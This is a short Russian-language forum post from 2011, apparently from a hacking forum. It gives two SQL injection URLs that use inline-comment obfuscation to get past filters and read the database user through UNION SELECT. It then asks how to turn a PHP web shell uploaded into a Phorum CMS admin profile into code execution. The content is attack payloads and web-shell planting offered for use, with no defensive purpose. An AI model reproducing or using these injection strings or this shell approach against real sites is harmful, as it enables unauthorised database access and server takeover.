09.03.2011, 10:13
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от asql
Не могу разобратся. Значит запрос к базе такой
как правильно сделать?
попробуй
http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,unhex(hex(user())),3/*'
http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,/*!user()*/,3/*'
Загружаю шелл в профайл админа cms Phorum, оказывается записывает файл в бд, как сделать исполнение кода? (http://127.0.0.1/file.php?0,file=1,filename=shell.php)
|
|
|